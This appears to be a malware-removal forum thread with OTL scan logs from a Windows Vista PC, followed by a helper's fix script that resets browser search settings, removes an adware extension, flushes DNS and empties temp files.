[2014/03/26 21:07:22 | 000,004,881 | ---- | M] () -- C:\Users\Alan\Desktop\google-pagespeed-logo.png
[2014/03/26 21:03:10 | 000,005,210 | ---- | M] () -- C:\Users\Alan\Desktop\gtmetrix.png
[2014/03/26 19:44:25 | 000,008,033 | ---- | M] () -- C:\Users\Alan\Desktop\progress.gif
[2014/03/26 18:12:25 | 004,535,820 | ---- | M] () -- C:\Users\Alan\Desktop\TAXZONE PLUS Features Walk Through.pdf
[2014/03/26 15:35:03 | 000,000,260 | ---- | M] () -- C:\Users\Alan\Desktop\.htaccess
[2014/03/26 15:08:33 | 000,010,609 | ---- | M] () -- C:\Users\Alan\Desktop\scope_square-940x940.jpg
[2014/03/26 15:08:24 | 000,013,706 | ---- | M] () -- C:\Users\Alan\Desktop\2013-10-31-12.40.23-940x702.jpg
[2014/03/26 15:08:14 | 000,009,617 | ---- | M] () -- C:\Users\Alan\Desktop\photo26.jpg
[2014/03/26 15:08:05 | 000,015,124 | ---- | M] () -- C:\Users\Alan\Desktop\keyboard.jpg
[2014/03/26 15:07:55 | 000,011,675 | ---- | M] () -- C:\Users\Alan\Desktop\wordpress-logo-square.png
[2014/03/26 15:05:18 | 000,325,635 | ---- | M] () -- C:\Users\Alan\Desktop\2012-04-05-11.46.04.jpg
[2014/03/26 14:15:14 | 000,021,787 | ---- | M] () -- C:\Users\Alan\Desktop\screen.jpg
[2014/03/26 12:36:12 | 000,061,571 | ---- | M] () -- C:\Users\Alan\Desktop\RobInvoice.jpg
[2014/03/26 12:19:18 | 000,546,475 | ---- | M] () -- C:\Users\Alan\Desktop\hometopbg.jpg
[2014/03/26 12:15:30 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-prayer-wall.php
[2014/03/25 17:43:44 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/03/25 17:04:23 | 001,038,974 | ---- | M] (Thisisu) -- C:\Users\Alan\Desktop\JRT (1).exe
[2014/03/25 17:01:22 | 001,179,320 | ---- | M] () -- C:\Users\Alan\Desktop\171281.zip
[2014/03/25 17:01:01 | 001,157,816 | ---- | M] () -- C:\Users\Alan\Desktop\171281.rar
[2014/03/25 16:25:37 | 000,053,594 | ---- | M] () -- C:\Users\Alan\Desktop\six.jpg
[2014/03/25 15:17:42 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\squeeze-page-3.php
[2014/03/25 11:45:18 | 000,136,974 | ---- | M] () -- C:\Users\Alan\Desktop\style.css
[2014/03/25 11:39:37 | 000,019,846 | ---- | M] () -- C:\Users\Alan\Desktop\footerbg.png
[2014/03/25 11:22:27 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-home.php
[2014/03/25 11:20:34 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\new.css
[2014/03/25 10:45:19 | 000,003,680 | ---- | M] () -- C:\Users\Alan\Desktop\page-members.php
[2014/03/25 00:50:01 | 000,011,691 | ---- | M] () -- C:\Users\Alan\Desktop\411ce1_home_office_100.jpg
[2014/03/24 15:19:22 | 000,003,895 | ---- | M] () -- C:\Users\Alan\Desktop\small-nav-icon.png
[2014/03/22 17:30:10 | 000,010,434 | ---- | M] () -- C:\Users\Alan\Desktop\777coin.png
[2014/03/21 02:51:51 | 000,091,352 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/03/21 01:51:15 | 000,000,085 | ---- | M] () -- C:\Windows\wininit.ini
[2014/03/21 01:29:24 | 005,290,840 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/03/15 20:07:56 | 000,000,808 | ---- | M] () -- C:\Users\Public\Desktop\Audacity.lnk
[2014/03/14 17:38:44 | 000,002,499 | ---- | M] () -- C:\Users\Public\Desktop\Skype.lnk
[2014/03/14 03:32:06 | 000,000,766 | ---- | M] () -- C:\Users\Alan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tracker.lnk
[2014/03/03 18:45:31 | 000,000,600 | ---- | M] () -- C:\Users\Alan\AppData\Roaming\winscp.rnd
[2014/02/27 03:02:23 | 000,748,424 | ---- | M] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2014/02/27 03:02:23 | 000,637,216 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/02/27 03:02:23 | 000,120,722 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/02/27 03:02:15 | 000,748,424 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[3 C:\Windows\SysWow64\*.tmp files -> C:\Windows\SysWow64\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/03/28 14:55:18 | 000,003,933 | ---- | C] () -- C:\Users\Alan\Desktop\terms-in-comments.php
[2014/03/28 14:00:51 | 000,365,691 | ---- | C] () -- C:\Users\Alan\Desktop\Screen Shot 2014-03-28 at 9.49.56 AM.png
[2014/03/28 13:52:37 | 000,216,089 | ---- | C] () -- C:\Users\Alan\Desktop\Futura Font.zip
[2014/03/28 13:15:15 | 000,533,740 | ---- | C] () -- C:\Users\Alan\Desktop\Screen Shot 2014-03-28 at 9.14.22 AM.png
[2014/03/27 23:29:08 | 000,002,804 | ---- | C] () -- C:\Users\Alan\Desktop\bg.jpg
[2014/03/27 23:23:44 | 000,025,539 | ---- | C] () -- C:\Users\Alan\Desktop\bg.png
[2014/03/27 21:18:45 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-checkout.php
[2014/03/27 19:58:58 | 000,007,276 | ---- | C] () -- C:\Users\Alan\Desktop\images.jpg
[2014/03/27 19:07:15 | 001,431,354 | ---- | C] () -- C:\Users\Alan\Desktop\EmailNinja.pdf
[2014/03/27 18:51:14 | 000,000,416 | ---- | C] () -- C:\Users\Alan\Desktop\close.png
[2014/03/27 18:51:06 | 000,000,715 | ---- | C] () -- C:\Users\Alan\Desktop\open.png
[2014/03/27 17:08:02 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\sidebar.php
[2014/03/27 16:21:29 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-speed-service.php
[2014/03/27 16:21:18 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-faq.php
[2014/03/27 16:21:10 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-custom-enquiry.php
[2014/03/27 16:20:54 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-contact.php
[2014/03/26 21:28:59 | 001,713,132 | ---- | C] () -- C:\Users\Alan\Desktop\salesvideo.wmv
[2014/03/26 21:10:11 | 000,012,208 | ---- | C] () -- C:\Users\Alan\Desktop\google-page-speed.png
[2014/03/26 21:08:46 | 000,232,310 | ---- | C] () -- C:\Users\Alan\Desktop\new-google-logo-knockoff.png
[2014/03/26 21:07:22 | 000,004,881 | ---- | C] () -- C:\Users\Alan\Desktop\google-pagespeed-logo.png
[2014/03/26 21:03:10 | 000,005,210 | ---- | C] () -- C:\Users\Alan\Desktop\gtmetrix.png
[2014/03/26 19:44:24 | 000,008,033 | ---- | C] () -- C:\Users\Alan\Desktop\progress.gif
[2014/03/26 18:11:56 | 004,535,820 | ---- | C] () -- C:\Users\Alan\Desktop\TAXZONE PLUS Features Walk Through.pdf
[2014/03/26 15:08:26 | 000,010,609 | ---- | C] () -- C:\Users\Alan\Desktop\scope_square-940x940.jpg
[2014/03/26 15:08:16 | 000,013,706 | ---- | C] () -- C:\Users\Alan\Desktop\2013-10-31-12.40.23-940x702.jpg
[2014/03/26 15:08:07 | 000,009,617 | ---- | C] () -- C:\Users\Alan\Desktop\photo26.jpg
[2014/03/26 15:07:58 | 000,015,124 | ---- | C] () -- C:\Users\Alan\Desktop\keyboard.jpg
[2014/03/26 15:07:47 | 000,011,675 | ---- | C] () -- C:\Users\Alan\Desktop\wordpress-logo-square.png
[2014/03/26 15:05:18 | 000,325,635 | ---- | C] () -- C:\Users\Alan\Desktop\2012-04-05-11.46.04.jpg
[2014/03/26 14:15:14 | 000,021,787 | ---- | C] () -- C:\Users\Alan\Desktop\screen.jpg
[2014/03/26 12:36:12 | 000,061,571 | ---- | C] () -- C:\Users\Alan\Desktop\RobInvoice.jpg
[2014/03/26 12:19:18 | 000,546,475 | ---- | C] () -- C:\Users\Alan\Desktop\hometopbg.jpg
[2014/03/26 12:15:30 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-prayer-wall.php
[2014/03/25 17:01:22 | 001,179,320 | ---- | C] () -- C:\Users\Alan\Desktop\171281.zip
[2014/03/25 17:01:00 | 001,157,816 | ---- | C] () -- C:\Users\Alan\Desktop\171281.rar
[2014/03/25 16:25:35 | 000,053,594 | ---- | C] () -- C:\Users\Alan\Desktop\six.jpg
[2014/03/25 15:17:41 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\squeeze-page-3.php
[2014/03/25 12:02:15 | 000,000,260 | ---- | C] () -- C:\Users\Alan\Desktop\.htaccess
[2014/03/25 11:44:53 | 000,136,974 | ---- | C] () -- C:\Users\Alan\Desktop\style.css
[2014/03/25 11:39:36 | 000,019,846 | ---- | C] () -- C:\Users\Alan\Desktop\footerbg.png
[2014/03/25 11:22:27 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-home.php
[2014/03/25 11:20:34 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\new.css
[2014/03/25 10:45:19 | 000,003,680 | ---- | C] () -- C:\Users\Alan\Desktop\page-members.php
[2014/03/25 00:50:00 | 000,011,691 | ---- | C] () -- C:\Users\Alan\Desktop\411ce1_home_office_100.jpg
[2014/03/24 15:19:21 | 000,003,895 | ---- | C] () -- C:\Users\Alan\Desktop\small-nav-icon.png
[2014/03/22 17:30:10 | 000,010,434 | ---- | C] () -- C:\Users\Alan\Desktop\777coin.png
[2014/03/21 01:52:24 | 000,256,000 | ---- | C] () -- C:\Windows\PEV.exe
[2014/03/21 01:52:24 | 000,208,896 | ---- | C] () -- C:\Windows\MBR.exe
[2014/03/21 01:52:24 | 000,098,816 | ---- | C] () -- C:\Windows\sed.exe
[2014/03/21 01:52:24 | 000,080,412 | ---- | C] () -- C:\Windows\grep.exe
[2014/03/21 01:52:24 | 000,068,096 | ---- | C] () -- C:\Windows\zip.exe
[2014/03/21 01:51:10 | 000,000,085 | ---- | C] () -- C:\Windows\wininit.ini
[2014/03/15 20:07:56 | 000,000,820 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Audacity.lnk
[2014/03/15 20:07:56 | 000,000,808 | ---- | C] () -- C:\Users\Public\Desktop\Audacity.lnk
[2014/03/14 17:38:44 | 000,002,499 | ---- | C] () -- C:\Users\Public\Desktop\Skype.lnk
[2013/12/20 23:23:07 | 001,391,616 | ---- | C] () -- C:\Windows\SysWow64\ActPDF.dll
[2013/10/01 13:03:01 | 000,000,028 | ---- | C] () -- C:\Users\Alan\.gitconfig
[2013/05/23 22:28:21 | 000,001,456 | ---- | C] () -- C:\Users\Alan\AppData\Local\Adobe Save for Web 13.0 Prefs
[2013/04/25 23:32:54 | 000,748,424 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013/04/25 23:32:32 | 000,000,023 | ---- | C] () -- C:\Windows\ODBCINST.INI
[2013/02/24 17:37:10 | 000,000,600 | ---- | C] () -- C:\Users\Alan\AppData\Roaming\winscp.rnd
[2012/09/02 10:59:14 | 001,036,288 | ---- | C] () -- C:\Windows\SysWow64\lxdwdrs.dll
[2012/09/02 10:59:14 | 000,081,920 | ---- | C] () -- C:\Windows\SysWow64\lxdwcaps.dll
[2012/09/02 10:59:14 | 000,069,632 | ---- | C] () -- C:\Windows\SysWow64\lxdwcnv4.dll
[2012/07/15 12:18:24 | 000,023,552 | ---- | C] () -- C:\Users\Alan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2012/06/08 22:25:27 | 000,000,600 | ---- | C] () -- C:\Users\Alan\AppData\Local\PUTTY.RND
[2011/05/13 13:08:58 | 000,000,680 | ---- | C] () -- C:\Users\Alan\AppData\Local\d3d9caps.dat
[2011/03/29 09:38:49 | 000,013,078 | ---- | C] () -- C:\Users\Alan\AppData\Roaming\wklnhst.dat
[2011/03/28 12:38:47 | 000,015,812 | ---- | C] () -- C:\Users\Alan\danube.zip
[2011/03/28 12:37:46 | 000,023,841 | ---- | C] () -- C:\Users\Alan\bedizen.zip
[2011/03/26 17:58:01 | 000,000,258 | RHS- | C] () -- C:\ProgramData\ntuser.pol
 
========== ZeroAccess Check ==========
 
[2006/11/02 15:30:40 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2012/06/08 17:59:03 | 012,899,840 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2012/06/08 17:47:00 | 011,586,048 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/04/11 07:11:14 | 000,891,392 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\SysWow64\wbem\fastprox.dll -- [2009/04/11 06:28:19 | 000,614,912 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2008/01/21 02:50:58 | 000,513,024 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\SysWow64\wbem\wbemess.dll
 
========== LOP Check ==========
 
[2014/03/15 21:45:16 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Audacity
[2013/10/01 23:14:48 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\AVG
[2011/03/26 12:34:10 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\AVG10
[2013/12/20 22:13:01 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\com.adobe.downloadassistant.AdobeDownloadAssistant
[2014/02/05 22:05:33 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\com.elance.tracker
[2013/12/03 18:54:59 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Dropbox
[2014/03/28 16:06:38 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\FileZilla
[2013/10/01 13:51:37 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\GitHub
[2013/10/01 20:54:09 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\GoodSync
[2011/04/08 21:25:07 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Inspyder Sitemap Creator
[2013/04/25 23:37:22 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\MySQL
[2013/10/01 21:04:11 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Nico Mak Computing
[2013/04/26 13:39:49 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Notepad++
[2012/06/01 16:33:17 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\OpenOffice.org
[2013/03/25 10:56:59 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Opera
[2013/05/23 13:20:58 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\StageManager.BD092818F67280F4B42B04877600987F0111B594.1
[2012/07/21 11:10:40 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Subversion
[2012/09/06 07:02:10 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Tatara Systems
[2012/06/01 00:40:19 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Template
[2013/04/28 15:15:47 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\TuneUp Software
[2012/07/22 22:28:22 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\UBot Studio
[2014/01/22 17:09:44 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\uTorrent
[2014/02/18 10:20:56 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\WinFF
[2013/02/14 17:45:20 | 000,000,000 | ---D | M] -- C:\Users\Default\AppData\Roaming\TuneUp Software
[2013/02/14 17:45:20 | 000,000,000 | ---D | M] -- C:\Users\Default User\AppData\Roaming\TuneUp Software
 
========== Purity Check ==========
 
 
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 120 bytes -> C:\ProgramData\TEMP:D5AD7675
 
< End of report >
 

Run OTL

  • Under the Custom Scans/Fixes box at the bottom, paste in the following

    :OTL
    FF - prefs.js..browser.search.defaultenginename,S: S", ""
    FF - prefs.js..browser.search.order.1: ""
    FF - prefs.js..browser.search.order.1,S: S", ""
    FF - prefs.js..browser.search.selectedEngine,S: S", ""
    [2014/02/12 21:00:40 | 000,000,000 | ---D | M] (YoTuBerAddsRemoVu) -- C:\Users\Alan\AppData\Roaming\Mozilla\Firefox\Profiles\5lqwfxjt.default\extensions\tafo@oescgz.org
    CHR - Extension: YoTuBerAddsRemoVu = C:\Users\Alan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mggdnalmmmoogbjpihpbafcjfmoppdkk\2.4_0\
    [2014/01/22 17:09:44 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\uTorrent
    :files
    ipconfig /flushdns /c
    :Commands
    [emptytemp]

  • Then click the Run Fix button at the top
  • Let the program run unhindered, reboot the PC when it is done
  • Please post the OTL fix log in your next reply.

Note: A copy of an OTL fix log is saved in a text file at C:\_OTL\MovedFiles

Here is the Extras.Txt

 

OTL Extras logfile created on: 28/03/2014 16:07:42 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Alan\Desktop
64bit-Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000809 | Country: United Kingdom | Language: ENG | Date Format: dd/MM/yyyy
 
3.87 Gb Total Physical Memory | 2.41 Gb Available Physical Memory | 62.28% Memory free
7.95 Gb Paging File | 5.62 Gb Available in Paging File | 70.63% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 451.62 Gb Total Space | 247.92 Gb Free Space | 54.90% Space Free | Partition Type: NTFS
Drive D: | 14.14 Gb Total Space | 1.92 Gb Free Space | 13.55% Space Free | Partition Type: NTFS
 
Computer Name: ALAN-PC | User Name: Alan | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
.html[@ = Opera.HTML] -- C:\Program Files (x86)\Opera\Opera.exe (Opera Software)
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
.html [@ = Opera.HTML] -- C:\Program Files (x86)\Opera\Opera.exe (Opera Software)
 
[HKEY_USERS\S-1-5-21-465606687-3642172284-1488456202-1000\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found
 
========== Shell Spawning ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [print] -- rundll32.exe %windir%\system32\mshtml.dll,PrintHTML "%1"
http [open] -- "C:\Program Files (x86)\Opera\Opera.exe" "%1" (Opera Software)
https [open] -- "C:\Program Files (x86)\Opera\Opera.exe" "%1" (Opera Software)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /separate,/e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [print] -- rundll32.exe %windir%\system32\mshtml.dll,PrintHTML "%1"
http [open] -- "C:\Program Files (x86)\Opera\Opera.exe" "%1" (Opera Software)
https [open] -- "C:\Program Files (x86)\Opera\Opera.exe" "%1" (Opera Software)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /separate,/e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
========== Security Center Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
"UacDisableNotify" = 0
"InternetSettingsDisableNotify" = 0
"AutoUpdateDisableNotify" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
"VistaSp1" = 9F 9E 16 8C DC 5B C8 01  [binary data]
"VistaSp2" = 05 E8 16 0A 64 11 CC 01  [binary data]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"oobe_av" = 1
 
========== System Restore Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 0
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
========== Authorized Applications List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0B14EC29-05CE-4055-996C-2704A19B5434}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 | 
"{0FA94DFF-9D8F-4A85-86EE-C9A128D8837F}" = lport=445 | protocol=6 | dir=in | app=system | 
"{299230F4-9AD1-480C-84C9-756E9EFBB42E}" = rport=138 | protocol=17 | dir=out | app=system | 
"{3D18C346-3705-427F-8978-0365603FC6F7}" = lport=3306 | protocol=6 | dir=in | name=port 3306 | 
"{3D20804A-0C3C-4825-839A-5E15F4A31254}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe | 
"{3E935899-21FF-457C-ACD6-2EAD888E2257}" = rport=3702 | protocol=17 | dir=out | svc=fdrespub | app=%systemroot%\system32\svchost.exe | 
"{6E7B3BC4-F55F-4B41-84DD-8BF9350208E5}" = lport=139 | protocol=6 | dir=in | app=system | 
"{7D9D76F2-E432-486B-B98D-6FA923D9C6B4}" = rport=139 | protocol=6 | dir=out | app=system | 
"{8502597B-2792-463D-B9C7-5F2A8DA386F1}" = lport=137 | protocol=17 | dir=in | app=system | 
"{8A6DF4D9-3672-410C-8E39-8F4D74E7D1A1}" = rport=137 | protocol=17 | dir=out | app=system | 
"{960284B3-F3DD-4FB2-95CB-74B08DB2772E}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{9865A2BE-262B-44C9-AC25-D938E2D81C4B}" = lport=138 | protocol=17 | dir=in | app=system | 
"{9A208D2F-9734-4576-A36A-8E7D759BC271}" = rport=3702 | protocol=17 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe | 
"{A9BBB353-CEE6-4E28-9644-4E495BA7A8C6}" = lport=3702 | protocol=17 | dir=in | svc=fdrespub | app=%systemroot%\system32\svchost.exe | 
"{ADA914F3-7A93-410E-8B3F-6EB94A0E70E9}" = lport=3702 | protocol=17 | dir=in | svc=fdphost | app=%systemroot%\system32\svchost.exe | 
"{B1DE4EAE-A611-4245-9DCA-A35536A0B2F0}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{C28D95FF-F6EA-4D0E-981B-346E7B54745D}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{CA75102F-8D05-415B-8E7B-F91945E285B3}" = lport=6004 | protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office12\outlook.exe | 
"{CE05F875-FA40-4D4C-8D11-3B4D07E8D9C7}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{FB7AFD5A-0F1F-4F2B-B493-7AB53EECD980}" = rport=445 | protocol=6 | dir=out | app=system | 
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0612832C-7687-4178-A9F7-6B0B011B53B9}" = protocol=17 | dir=in | app=c:\windows\system32\lxdwcoms.exe | 
